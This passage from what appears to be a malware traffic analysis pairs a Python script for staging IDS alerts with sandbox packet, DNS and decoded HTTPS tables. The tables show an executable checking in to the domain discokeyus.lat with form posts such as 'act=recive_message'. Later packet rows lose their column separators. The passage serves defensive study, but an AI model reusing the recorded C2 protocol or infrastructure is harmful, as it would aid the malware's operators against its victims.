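    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


def parse_alerts(text: str) -> list[Alert]:
    """Parse pipe-delimited alert rows; a row with the wrong number of fields is an error, not skipped."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = [c.strip() for c in line.split("|")]
        if len(f) != 9:
            raise ValueError(f"malformed alert row: {line!r}")
        alerts.append(Alert(f[0], int(f[1]), f[2], int(f[3]), f[4], int(f[5]), f[6], int(f[7]), f[8]))
    return alerts


def stages_by_connection(alerts):
    """Group alerts by (src ip, src port, dst ip, dst port, proto) and list the stages each reached, in order."""
    conns = OrderedDict()
    for a in alerts:
        key = (a.src_ip, a.src_port, a.dst_ip, a.dst_port, a.proto)
        stage = STAGE_BY_SID.get(a.sid, f"sid-{a.sid}")
        stages = conns.setdefault(key, [])
        if stage not in stages:
            stages.append(stage)
    return conns


def extract_iocs(alerts):
    """Collect the re-fanged domain(s), the C2 hosts and the SIDs that fired."""
    domains, c2_hosts = set(), set()
    for a in alerts:
        for m in DEFANGED_DOMAIN.finditer(a.signature):
            domains.add(m.group(1).replace(" ", ""))  # remove the defanging space
        if a.proto == "TCP":  # the UDP alert's destination is the DNS resolver, not C2 infrastructure
            c2_hosts.add((a.dst_ip, a.dst_port))
    return {"domains": sorted(domains), "c2_hosts": sorted(c2_hosts), "sids": sorted({a.sid for a in alerts})}


def exfiltration_connections(alerts):
    """(timestamp, client port) of every connection on which an exfiltration signature fired."""
    return [(a.ts, a.src_port) for a in alerts if STAGE_BY_SID.get(a.sid) == "exfiltration"]


if __name__ == "__main__":
    parsed = parse_alerts(ALERT_ROWS)
    for key, stages in stages_by_connection(parsed).items():
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}/{key[4]}: {' > '.join(stages)}")
    print(extract_iocs(parsed))
    print(exfiltration_connections(parsed))
```

Run on the transcribed rows, the script reports port 49730 as tls-sni > ja3-fingerprint > c2-traffic > c2-checkin, port 49732 as tls-sni > ja3-fingerprint > exfiltration, and port 49733 as SNI and JA3 only; the indicators come out as discokeyus.lat and 104.21.21.99:443. The same grouping applied to the remaining rows of the table shows that every later connection stops at the SNI/JA3 stage.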
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 20:54:14.998786926 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:14.998836040 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:14.998963118 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:15.026006937 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:15.026032925 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.261853933 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.261976004 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.265597105 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.265608072 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.266164064 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.313307047 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.361743927 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.361774921 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.361880064 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.970108986 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.970349073 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.970453024 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.988377094 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.988404036 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:16.988420963 CET | 49730 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:16.988429070 CET | 443 | 49730 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:17.012738943 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:17.012775898 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:17.012866974 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:17.013231039 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:17.013247967 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:18.239087105 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:18.239270926 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:18.241645098 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:18.241657972 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:18.241996050 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:18.243715048 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:18.243756056 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:18.243810892 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.027708054 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.027759075 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.027867079 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.027884960 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.044748068 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.044881105 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.044894934 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.078310966 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.078349113 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.078469992 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.078489065 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.078602076 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.092026949 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.106513977 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.106616020 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.106638908 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.154079914 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.154273033 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.154299974 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.203939915 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.216558933 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.226874113 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.227004051 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.227065086 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.227066040 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.229104996 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.229104996 CET | 49731 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.229136944 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.229147911 CET | 443 | 49731 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.397494078 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.397615910 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:19.397738934 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.398073912 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:19.398114920 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:20.632775068 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:20.632863998 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:20.636523008 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:20.636553049 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:20.636889935 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:20.638246059 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:20.638433933 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:20.638478994 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:20.638552904 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:20.638567924 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:22.529388905 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:22.529534101 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:22.529633999 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:22.529802084 CET | 49732 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:22.529824972 CET | 443 | 49732 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:22.721307993 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:22.721359968 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:22.721446991 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:22.721805096 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:22.721822977 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:24.060672998 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:24.060830116 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:24.066598892 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:24.066615105 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:24.067615986 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:24.068958998 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:24.069125891 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:24.069165945 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:25.271780968 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:25.271991968 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:25.272109032 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:25.272212029 CET | 49733 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:25.272229910 CET | 443 | 49733 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:25.835374117 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:25.835426092 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:25.835515976 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:25.849277020 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:25.849307060 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:27.078337908 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:27.078444004 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:27.080307007 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:27.080317974 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:27.080751896 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:27.082448006 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:27.082633972 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:27.082659960 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:27.082753897 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:27.082763910 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:30.952018023 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:30.952296019 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:30.952384949 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:30.955409050 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:30.955452919 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:31.654572010 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:31.654627085 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:31.654721975 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:31.655102015 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:31.655118942 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:32.981477976 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:32.981623888 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:32.985044003 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:32.985058069 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:32.985403061 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:32.986757040 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:32.986895084 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:32.986901999 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:37.518337965 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:37.518440962 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:37.518501997 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:37.518620014 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:37.518646002 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:38.047904015 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:38.047950029 CET | 443 | 49742 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:38.048048019 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:38.048433065 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:38.048449039 CET | 443 | 49742 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:39.281224966 CET | 443 | 49742 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:39.281395912 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:39.285387993 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:39.285409927 CET | 443 | 49742 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:39.285851955 CET | 443 | 49742 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:39.295090914 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:39.295926094 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:39.295970917 CET | 443 | 49742 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:39.296135902 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
Dec 18, 2024 20:54:39.296169043 CET | 443 | 49742 | 104.21.21.99 | 192.168.2.4
Dec 18, 2024 20:54:39.296400070 CET | 49742 | 443 | 192.168.2.4 | 104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.296432972 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.296617985 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.296647072 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.296818018 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.296854019 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297012091 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297043085 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297056913 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297070980 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297234058 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297254086 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297275066 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297436953 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297463894 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.343353033 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346319914 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346359015 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346389055 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346412897 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346435070 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346443892 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346518993 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346533060 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.548615932 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.548721075 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.548777103 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.548954964 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.548979998 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.558614016 CET49743443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.558697939 CET44349743104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.558871984 CET49743443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.559325933 CET49743443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.559360027 CET44349743104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:46.297827005 CET49743443192.168.2.4104.21.21.99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 20:54:14.474132061 CET | 64461 | 53 | 192.168.2.4 | 1.1.1.1
Dec 18, 2024 20:54:14.993315935 CET | 53 | 64461 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 20:54:14.474132061 CET | 192.168.2.4 | 1.1.1.1 | 0x2f1b | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 20:54:14.993315935 CET | 1.1.1.1 | 192.168.2.4 | 0x2f1b | No error (0) | discokeyus.lat |  | 104.21.21.99 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:54:14.993315935 CET | 1.1.1.1 | 192.168.2.4 | 0x2f1b | No error (0) | discokeyus.lat |  | 172.67.197.170 | A (IP address) | IN (0x0001) | false
• discokeyus.lat
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.21.99 | 443 | 7736 | C:\Users\user\Desktop\k6A01XaeEn.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:54:16 UTC | 261 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
2024-12-18 19:54:16 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-18 19:54:16 UTC | 1036 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Dec 2024 19:54:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=037aj54shpbqlqkm2dlp0u6g57; expires=Sun, 13-Apr-2025 13:40:55 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2B6OrQT3UiECel1LTTb8LnDCDM0rg6pKRFsjecMvr4MmUe4A6qlMzNZk3dJ2oQ2whlVcwqHFf2VicL9tabR0MiXDfOEJJRohVsdiIJOiTKP%2BaOm0LMLJPOeNB8uWUc%2FjtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f41b42d5d1a7cf0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1819&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1568206&cwnd=230&unsent_bytes=0&cid=558296f71d17e37f&ts=732&x=0"
2024-12-18 19:54:16 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-12-18 19:54:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | 7736 | C:\Users\user\Desktop\k6A01XaeEn.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:54:18 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 42
    Host: discokeyus.lat
2024-12-18 19:54:18 UTC | 42 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=
2024-12-18 19:54:19 UTC | 1042 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Dec 2024 19:54:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=bo1hsj5br2lp3pegn1iabdnmh9; expires=Sun, 13-Apr-2025 13:40:57 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61OOeMa8wcCYTB9omVCW%2Fqxmb%2BotnMqfMLpAQ4JTf%2FvwhzCn4kPELv0V%2BvFzo%2FMLyElrX8jZRX%2BYRveQIyMlcIqPaBDQLeU55UKofjkUDH1h3vAmNF2PtdlxSx8ooPiPfA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f41b439ba2342d4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1600&rtt_var=740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=940&delivery_rate=1350601&cwnd=247&unsent_bytes=0&cid=bb6fca8b289f2b1b&ts=798&x=0"
2024-12-18 19:54:19 UTC | 327 | IN | Data Raw: 34 39 31 63 0d 0a 58 53 6b 5a 6a 41 59 34 7a 63 67 44 69 31 52 36 2b 4e 6c 4d 76 58 61 61 75 4a 6d 67 37 44 72 59 36 36 37 36 4b 2b 66 4a 6a 6b 55 6d 43 32 2b 75 50 41 7a 68 36 6e 44 75 64 6b 43 4d 71 7a 6e 59 57 72 6a 5a 2f 59 4c 57 58 4c 6d 48 33 5a 38 48 78 62 2f 6a 5a 32 64 50 65 4f 42 31 58 65 48 71 5a 76 4e 32 51 4b 4f 69 62 74 67 59 75 49 4b 37 78 59 5a 59 75 59 66 4d 6d 30 43 49 75 65 49 6d 4e 55 56 2b 35 47 4e 62 71 61 6c 76 35 6a 45 66 6e 62 67 6d 30 78 2f 33 30 50 53 43 77 42 69 39 6b 59 7a 41 43 61 71 73 2b 69 51 51 53 47 72 6e 4a 45 58 68 73 79 48 75 4f 6c 6a 43 2b 79 33 59 46 50 62 65 2f 63 75 45 55 72 43 50 7a 5a 35 42 6c 36 44 6f 4c 54 56 4c 66 65 56 70 55 72 32 6b 5a 65 45 36 47 5a 65 34 62 70 46 55 2f 38 4b 37 6d 73 34 4c 69 49 72 64 69
    Data Ascii: 491cXSkZjAY4zcgDi1R6+NlMvXaauJmg7DrY6676K+fJjkUmC2+uPAzh6nDudkCMqznYWrjZ/YLWXLmH3Z8Hxb/jZ2dPeOB1XeHqZvN2QKOibtgYuIK7xYZYuYfMm0CIueImNUV+5GNbqalv5jEfnbgm0x/30PSCwBi9kYzACaqs+iQQSGrnJEXhsyHuOljC+y3YFPbe/cuEUrCPzZ5Bl6DoLTVLfeVpUr2kZeE6GZe4bpFU/8K7ms4LiIrdi
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 4e 6a 4b 2b 4d 47 61 56 61 76 4a 30 39 5a 51 78 61 7a 67 5a 32 63 4c 66 65 42 6c 56 36 2b 34 61 65 49 39 48 59 69 77 4a 39 49 5a 2b 4e 66 78 7a 59 31 59 76 59 50 47 6c 30 4f 42 70 75 45 68 50 30 73 37 6f 43 52 64 74 2b 6f 35 71 52 55 64 69 72 77 69 79 56 62 43 6d 75 53 4d 6c 78 69 39 68 59 7a 41 43 59 32 75 37 79 51 30 52 48 6a 6d 62 30 69 76 75 47 66 6b 4d 77 71 63 76 69 44 56 46 2b 72 51 39 63 53 4e 55 62 47 41 79 5a 39 4e 78 65 57 73 49 43 63 4c 49 36 35 46 56 36 53 6d 61 2f 34 32 57 49 58 31 4e 35 38 54 39 4a 71 6a 67 6f 70 5a 76 6f 6a 49 6c 6b 65 42 70 2b 6f 70 4d 6b 52 39 35 47 52 64 70 61 4a 70 36 44 73 54 6c 62 73 72 30 68 44 2b 31 76 72 48 7a 68 62 36 6a 74 54 59 45 63 57 46 36 79 51 74 43 55 37 74 61 6c 53 6f 76 43 48 32 65 41 48 61 76 43 4b 66
